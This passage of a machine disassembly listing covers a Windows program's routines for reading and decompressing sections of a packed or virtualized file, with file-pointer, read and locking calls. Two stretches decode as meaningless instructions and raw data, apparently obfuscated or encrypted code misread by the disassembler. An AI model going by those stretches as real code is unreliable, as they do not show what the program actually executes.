loc_50099A: ; CODE XREF: sub_500950+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_5009FD
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_5009D6
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_5009FF
; ---------------------------------------------------------------------------
loc_5009D6: ; CODE XREF: sub_500950+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_5009E1
jmp short loc_5009FD
sub_500950 endp
; =============== S U B R O U T I N E =======================================
sub_5009E1 proc near ; CODE XREF: sub_500950+8A�p
; DATA XREF: _6:0050E3B0�o
mov eax, ds:dword_5118E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_5009FC
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_5009FC: ; CODE XREF: sub_5009E1+C�j
retn
sub_5009E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500950
loc_5009FD: ; CODE XREF: sub_500950+50�j
; sub_500950+8F�j
xor eax, eax
loc_5009FF: ; CODE XREF: sub_500950+84�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_500950
; ---------------------------------------------------------------------------
loc_500A10: ; CODE XREF: sub_500C5C+2F1�p
; sub_501177+1CF�p
push ebp
mov ebp, esp
sub esp, 0ECh
push ebx
push esi
push edi
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-10h], eax
mov eax, ds:dword_5118F8
mov [ebp-4], eax
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-8], eax
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz loc_500AD8
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jnz short loc_500AD8
mov eax, [ebp-8]
mov ecx, [ebp+0Ch]
sub ecx, [eax+4]
mov [ebp-14h], ecx
mov eax, [ebp-14h]
xor edx, edx
push 8
pop ecx
div ecx
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0
jz short loc_500A93
mov eax, [ebp+0Ch]
sub eax, [ebp-18h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
add eax, [ebp-18h]
mov [ebp-10h], eax
mov eax, [ebp-4]
add eax, [ebp-18h]
mov [ebp-4], eax
loc_500A93: ; CODE XREF: _5:00500A76�j
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
test edx, edx
jz short loc_500AB8
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
push 8
pop eax
sub eax, edx
mov ecx, [ebp-10h]
add ecx, eax
mov [ebp-10h], ecx
loc_500AB8: ; CODE XREF: _5:00500A9F�j
mov eax, [ebp+8]
mov ecx, [ebp-10h]
add ecx, [eax+4]
mov eax, [ebp-8]
cmp ecx, [eax+8]
jbe short loc_500AD8
mov eax, [ebp-8]
mov ecx, [ebp+8]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp-10h], eax
loc_500AD8: ; CODE XREF: _5:00500A46�j _5:00500A57�j ...
push 0
push 0
push dword ptr [ebp-0Ch]
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_511788 ; SetFilePointer
cmp eax, [ebp-0Ch]
jz short loc_500AF7
xor eax, eax
jmp loc_500C55
; ---------------------------------------------------------------------------
loc_500AF7: ; CODE XREF: _5:00500AEE�j
push 0
push dword ptr [ebp+14h]
push dword ptr [ebp-10h]
push ds:dword_5118F8
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_51177C ; ReadFile
test eax, eax
jnz short loc_500B1C
xor eax, eax
jmp loc_500C55
; ---------------------------------------------------------------------------
loc_500B1C: ; CODE XREF: _5:00500B13�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp-10h]
jz short loc_500B2D
xor eax, eax
jmp loc_500C55
; ---------------------------------------------------------------------------
loc_500B2D: ; CODE XREF: _5:00500B24�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz loc_500C3C
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 10h
jnz short loc_500BA9
push offset dword_460000
call near ptr loc_4FDB7D+1 ; CODE XREF: _5:00500B5B�j
sub eax, 7424E45Ah
db 3Eh
jle short near ptr loc_500B51+3
cmpsb
push edi
fisttp dword ptr [edx+esi*4+61h]
clc
lds ebp, [ecx-26h]
db 2Eh ; CODE XREF: _5:loc_500B99�j
icebp
and eax, 7EFC9E45h
dec edi
jmp short loc_500B99
; ---------------------------------------------------------------------------
dw 4521h
dd 72A5F15Eh, 0DB928426h, 0E0C5324Fh, 57F284DAh, 0C220AB13h
dd 6D61055Fh, 0A31D6C36h, 90A16E44h, 0E2FDF0E3h
; ---------------------------------------------------------------------------
cmc
loc_500B99: ; CODE XREF: _5:00500B70�j
jmp short near ptr loc_500B68+1
; ---------------------------------------------------------------------------
db 0C1h
db 2 dup(90h)
dw 0C033h
dd 0EE75C085h, 93E9h
db 0
; ---------------------------------------------------------------------------
loc_500BA9: ; CODE XREF: _5:00500B4A�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz short loc_500C32
push 120000h
call near ptr loc_4FDB7D+1
mov esp, 0E59375A9h
lodsd
punpckhwd mm7, mm4
mov bl, 0AEh
xchg eax, edx
enter 493Dh, 20h
add esi, esi
xchg dh, [ebx-683002FDh]
adc [edi-0B71F021h], ebx
mov dl, 34h
; ---------------------------------------------------------------------------
db 8Ch, 0F5h, 65h
dd 975D2033h, 0B1BE20AAh, 97A380A4h, 9FC19C8Fh, 2DDFCC3h
dd 0E1EECB75h, 9276A8BBh, 680CACDAh, 31B9E518h, 0ED0915C7h
dd 0DA20F7ABh, 0DB496D37h, 758264EEh, 9E554C68h, 0DE8DD8CBh
dd 0CE190CFFh, 0A5B28F65h, 0C0339090h, 0EE75C085h
; ---------------------------------------------------------------------------
jmp short loc_500C3C
; ---------------------------------------------------------------------------
loc_500C32: ; CODE XREF: _5:00500BB5�j
mov ecx, 0EF000014h
call sub_508342
loc_500C3C: ; CODE XREF: _5:00500B38�j _5:00500C30�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp+10h]
jnb short loc_500C4A
xor eax, eax
jmp short loc_500C55
; ---------------------------------------------------------------------------
loc_500C4A: ; CODE XREF: _5:00500C44�j
mov eax, [ebp+14h]
mov ecx, [ebp+10h]
mov [eax], ecx
mov eax, [ebp-4]
loc_500C55: ; CODE XREF: _5:00500AF2�j _5:00500B17�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_500C5C proc near ; CODE XREF: sub_50100B+30�p
; sub_50100B+EB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00500EAD SIZE 0000015E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3B8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
mov ecx, ds:dword_511908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
mov [ebp+var_24], eax
and [ebp+var_28], 0
and [ebp+var_40], 0
jmp short loc_500CB0
; ---------------------------------------------------------------------------
loc_500CA9: ; CODE XREF: sub_500C5C:loc_500CED�j
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_40], eax
loc_500CB0: ; CODE XREF: sub_500C5C+4B�j
cmp [ebp+var_40], 3
jnb short loc_500CEF
mov eax, [ebp+var_40]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_510B7C[eax]
cmp eax, [ecx]
jnz short loc_500CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:dword_510B78[eax]
cmp eax, [ebp+arg_4]
jnz short loc_500CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:off_510B80[eax]
mov eax, [eax]
jmp loc_500FFA
; ---------------------------------------------------------------------------
loc_500CED: ; CODE XREF: sub_500C5C+6B�j
; sub_500C5C+7C�j
jmp short loc_500CA9
; ---------------------------------------------------------------------------
loc_500CEF: ; CODE XREF: sub_500C5C+58�j
lea eax, [ebp+var_48]
push eax
call ds:dword_51172C ; GetSystemTimeAsFileTime
and [ebp+var_4C], 0
jmp short loc_500D06
; ---------------------------------------------------------------------------
loc_500CFF: ; CODE XREF: sub_500C5C:loc_500D4D�j
mov eax, [ebp+var_4C]
inc eax
mov [ebp+var_4C], eax
loc_500D06: ; CODE XREF: sub_500C5C+A1�j
cmp [ebp+var_4C], 3
jnb short loc_500D4F
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_510B70
mov [ebp+var_74], eax
mov eax, [ebp+var_74]
mov ecx, [ebp+var_44]
cmp ecx, [eax+4]
jl short loc_500D4D
jg short loc_500D31
mov eax, [ebp+var_74]
mov ecx, [ebp+var_48]
cmp ecx, [eax]
jbe short loc_500D4D
loc_500D31: ; CODE XREF: sub_500C5C+C9�j
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_510B70
mov ecx, [eax]
mov [ebp+var_48], ecx
mov eax, [eax+4]
mov [ebp+var_44], eax
mov eax, [ebp+var_4C]
mov [ebp+var_28], eax
loc_500D4D: ; CODE XREF: sub_500C5C+C7�j
; sub_500C5C+D3�j
jmp short loc_500CFF
; ---------------------------------------------------------------------------
loc_500D4F: ; CODE XREF: sub_500C5C+AE�j
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_510B78[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_510B7C[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_510B70
and dword ptr [eax], 0
and dword ptr [eax+4], 0
mov eax, [ebp+var_28]
imul eax, 18h
mov eax, ds:off_510B80[eax]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
cmp dword ptr [ecx+eax+8], 0
jnz loc_500EAD
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_54], eax
and [ebp+var_50], 0
and [ebp+var_4], 0
mov eax, [ebp+var_54]
shl eax, 2
push eax
call sub_50835A
pop ecx
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
mov [ebp+var_50], eax
and [ebp+var_58], 0
mov eax, [ebp+var_54]
shl eax, 2
mov ecx, [ebp+var_34]
mov ecx, [ecx+4]
sub ecx, eax
mov [ebp+var_5C], ecx
push 0
push 0
push [ebp+var_5C]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_511788 ; SetFilePointer
cmp eax, [ebp+var_5C]
jz short loc_500E1B
push 0FFFFFFFFh
and [ebp+var_78], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_78]
jmp loc_500FFA
; ---------------------------------------------------------------------------
loc_500E1B: ; CODE XREF: sub_500C5C+1A4�j
push 0
lea eax, [ebp+var_58]
push eax
mov eax, [ebp+var_54]
shl eax, 2
push eax
push [ebp+var_50]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_51177C ; ReadFile
test eax, eax
jnz short loc_500E54
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_500FFA
; ---------------------------------------------------------------------------
loc_500E54: ; CODE XREF: sub_500C5C+1DD�j
mov eax, [ebp+var_54]
shl eax, 2
cmp [ebp+var_58], eax
jz short loc_500E78
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_500FFA
; ---------------------------------------------------------------------------
loc_500E78: ; CODE XREF: sub_500C5C+201�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov edx, [ebp+var_50]
mov [ecx+eax+8], edx
and [ebp+var_50], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_500E9D
jmp short loc_500EAD
sub_500C5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_500E9D proc near ; CODE XREF: sub_500C5C+23A�p
; DATA XREF: _6:0050E3C0�o
mov eax, [ebp-50h]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_5083DD
pop ecx
retn
sub_500E9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_500C5C
loc_500EAD: ; CODE XREF: sub_500C5C+144�j
; sub_500C5C+23F�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov eax, [ecx+eax+8]
mov [ebp+var_30], eax
and [ebp+var_20], 0
and [ebp+var_1C], 0
cmp [ebp+arg_4], 0
jz short loc_500F2D
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_60], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_60]
jb short loc_500F00
push ds:off_50E4F8
push 93h
push ds:off_50E4FC
call sub_50848C
loc_500F00: ; CODE XREF: sub_500C5C+28C�j
and [ebp+var_64], 0
jmp short loc_500F0D
; ---------------------------------------------------------------------------
loc_500F06: ; CODE XREF: sub_500C5C+2CF�j
mov eax, [ebp+var_64]
inc eax
mov [ebp+var_64], eax
loc_500F0D: ; CODE XREF: sub_500C5C+2A8�j
mov eax, [ebp+var_64]
cmp eax, [ebp+arg_4]
jnb short loc_500F2D
mov eax, [ebp+var_64]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
mov ecx, [ebp+var_20]
add ecx, eax
mov [ebp+var_20], ecx
jmp short loc_500F06
; ---------------------------------------------------------------------------
loc_500F2D: ; CODE XREF: sub_500C5C+273�j
; sub_500C5C+2B7�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
push eax
mov eax, [ebp+var_34]
mov eax, [eax+4]
add eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call loc_500A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz short loc_500F62
xor eax, eax
jmp loc_500FFA
; ---------------------------------------------------------------------------
loc_500F62: ; CODE XREF: sub_500C5C+2FD�j
mov [ebp+var_2C], 10000h
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 80000000h
test eax, eax
jnz short loc_500FAE
push [ebp+var_1C]
push [ebp+var_38]
lea eax, [ebp+var_2C]
push eax
push [ebp+var_3C]
call sub_50D9F3
add esp, 10h
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_500FAC
push [ebp+var_68]
push offset aBoxReadcompres ; ":BOX:ReadCompressedSection: decompresio"...
call sub_508726
pop ecx
pop ecx
xor eax, eax
jmp short loc_500FFA
; ---------------------------------------------------------------------------
loc_500FAC: ; CODE XREF: sub_500C5C+33B�j
jmp short loc_500FC5
; ---------------------------------------------------------------------------
loc_500FAE: ; CODE XREF: sub_500C5C+31D�j
mov ecx, [ebp+var_1C]
mov esi, [ebp+var_38]
mov edi, [ebp+var_3C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_500FC5: ; CODE XREF: sub_500C5C:loc_500FAC�j
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_4]
mov ds:dword_510B78[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov ds:dword_510B7C[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_510B70
push eax
call ds:dword_51172C ; GetSystemTimeAsFileTime
mov eax, [ebp+var_3C]
loc_500FFA: ; CODE XREF: sub_500C5C+8C�j
; sub_500C5C+1BA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_500C5C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50100B proc near ; CODE XREF: sub_501177+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
shr eax, 10h
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
shr eax, 10h
mov [ebp+var_4], eax
push [ebp+var_10]
push [ebp+arg_0]
call sub_500C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_501050
xor eax, eax
jmp loc_501171
; ---------------------------------------------------------------------------
loc_501050: ; CODE XREF: sub_50100B+3C�j
mov eax, [ebp+var_14]
xor edx, edx
mov ecx, 10000h
div ecx
mov [ebp+var_8], edx
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_501074
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
jmp short loc_50107F
; ---------------------------------------------------------------------------
loc_501074: ; CODE XREF: sub_50100B+5F�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
loc_50107F: ; CODE XREF: sub_50100B+67�j
mov ecx, [ebp+var_18]
mov esi, [ebp+var_C]
add esi, [ebp+var_8]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_5010AE
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
jmp short loc_5010B9
; ---------------------------------------------------------------------------
loc_5010AE: ; CODE XREF: sub_50100B+99�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
loc_5010B9: ; CODE XREF: sub_50100B+A1�j
mov eax, [ebp+var_1C]
mov [ebp+var_8], eax
loc_5010BF: ; CODE XREF: sub_50100B+15E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jbe loc_50116E
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
ja short loc_5010F0
push ds:off_50E4F8
push 0BBh
push ds:off_50E4FC
call sub_50848C
loc_5010F0: ; CODE XREF: sub_50100B+CD�j
push [ebp+var_10]
push [ebp+arg_0]
call sub_500C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_501108
xor eax, eax
jmp short loc_501171
; ---------------------------------------------------------------------------
loc_501108: ; CODE XREF: sub_50100B+F7�j
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_501120
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_20], eax
jmp short loc_501127
; ---------------------------------------------------------------------------
loc_501120: ; CODE XREF: sub_50100B+108�j
mov [ebp+var_20], 10000h
loc_501127: ; CODE XREF: sub_50100B+113�j
mov ecx, [ebp+var_20]
mov esi, [ebp+var_C]
mov edi, [ebp+arg_4]
add edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_501159
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_24], eax
jmp short loc_501160
; ---------------------------------------------------------------------------
loc_501159: ; CODE XREF: sub_50100B+141�j
mov [ebp+var_24], 10000h
loc_501160: ; CODE XREF: sub_50100B+14C�j
mov eax, [ebp+var_8]
add eax, [ebp+var_24]
mov [ebp+var_8], eax
jmp loc_5010BF
; ---------------------------------------------------------------------------
loc_50116E: ; CODE XREF: sub_50100B+BA�j
push 1
pop eax
loc_501171: ; CODE XREF: sub_50100B+40�j
; sub_50100B+FB�j
pop edi
pop esi
leave
retn 0Ch
sub_50100B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_501177 proc near ; CODE XREF: sub_4FF94C+242�p
; sub_4FFFBF+194�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0050145D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3C8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 3Ch
push ebx
push esi
push edi
cmp [ebp+arg_14], 0
jnz short loc_5011A8
lea eax, [ebp+var_1C]
mov [ebp+arg_14], eax
loc_5011A8: ; CODE XREF: sub_501177+29�j
mov eax, ds:dword_5118E4
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz short loc_5011C9
mov eax, [ebp+var_3C]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_40], 1
jmp short loc_5011CD
; ---------------------------------------------------------------------------
loc_5011C9: ; CODE XREF: sub_501177+3D�j
and [ebp+var_40], 0
loc_5011CD: ; CODE XREF: sub_501177+50�j
movzx eax, [ebp+var_40]
test eax, eax
jz loc_50145D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_5118E4
call sub_50B871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_501436
cmp [ebp+arg_10], 0
jz short loc_501207
mov eax, [ebp+arg_10]
mov dword ptr [eax], 3E5h
loc_501207: ; CODE XREF: sub_501177+85�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_501254
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_51177C ; ReadFile
mov ecx, [ebp+arg_14]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp loc_50145F
; ---------------------------------------------------------------------------
loc_501254: ; CODE XREF: sub_501177+A5�j
cmp [ebp+arg_10], 0
jz short loc_501281
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_501281
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_20]
mov ecx, [ecx+4]
mov [eax+0Ch], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+8]
mov [eax+4], ecx
loc_501281: ; CODE XREF: sub_501177+E1�j
; sub_501177+F0�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov eax, [eax+4]
add eax, [ebp+arg_8]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_5012A7
mov eax, [ebp+var_30]
mov ecx, [ebp+var_20]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp+var_28], eax
loc_5012A7: ; CODE XREF: sub_501177+11F�j
cmp [ebp+arg_C], 0
jnz short loc_5012B3
lea eax, [ebp+var_2C]
mov [ebp+arg_C], eax
loc_5012B3: ; CODE XREF: sub_501177+134�j
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
cmp [ebp+arg_8], 0
jbe loc_5013B8
cmp [ebp+var_28], 0
jbe loc_5013B8
mov eax, [ebp+var_30]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jz short loc_5012FE
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+var_20]
call sub_50100B
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_5012F9
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_28]
mov [eax], ecx
loc_5012F9: ; CODE XREF: sub_501177+178�j
jmp loc_5013B6
; ---------------------------------------------------------------------------
loc_5012FE: ; CODE XREF: sub_501177+161�j
and [ebp+var_34], 0
loc_501302: ; CODE XREF: sub_501177+23A�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_5013B6
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_501326
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_4C], eax
jmp short loc_50132D
; ---------------------------------------------------------------------------
loc_501326: ; CODE XREF: sub_501177+1A2�j
mov [ebp+var_4C], 10000h
loc_50132D: ; CODE XREF: sub_501177+1AD�j
push [ebp+arg_C]
push [ebp+var_4C]
mov eax, [ebp+var_30]
mov eax, [eax+4]
mov ecx, [ebp+var_20]
add eax, [ecx+4]
add eax, [ebp+var_34]
push eax
push [ebp+var_20]
call loc_500A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz short loc_50137D
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_50136C
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_50], eax
jmp short loc_501373
; ---------------------------------------------------------------------------
loc_50136C: ; CODE XREF: sub_501177+1E8�j
mov [ebp+var_50], 10000h
loc_501373: ; CODE XREF: sub_501177+1F3�j
mov eax, [ebp+arg_C]
mov eax, [eax]
cmp eax, [ebp+var_50]
jz short loc_501383
loc_50137D: ; CODE XREF: sub_501177+1DB�j
and [ebp+var_24], 0
jmp short loc_5013B6
; ---------------------------------------------------------------------------
loc_501383: ; CODE XREF: sub_501177+204�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov esi, [ebp+var_38]
mov edi, [ebp+arg_4]
add edi, [ebp+var_34]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
add ecx, [eax]
mov [ebp+var_34], ecx
jmp loc_501302
; ---------------------------------------------------------------------------
loc_5013B6: ; CODE XREF: sub_501177:loc_5012F9�j
; sub_501177+191�j ...
jmp short loc_5013C5
; ---------------------------------------------------------------------------
loc_5013B8: ; CODE XREF: sub_501177+146�j
; sub_501177+150�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
loc_5013C5: ; CODE XREF: sub_501177:loc_5013B6�j
cmp [ebp+var_24], 0
jz short loc_5013DC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov ecx, [ebp+arg_C]
add eax, [ecx]
mov ecx, [ebp+var_20]
mov [ecx+4], eax
loc_5013DC: ; CODE XREF: sub_501177+252�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_24]
mov [eax], ecx
cmp [ebp+arg_10], 0
jz short loc_50141D
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_50141D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+0Ch]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax], 0
loc_50141D: ; CODE XREF: sub_501177+271�j
; sub_501177+280�j
push 0FFFFFFFFh
mov [ebp+var_54], 1
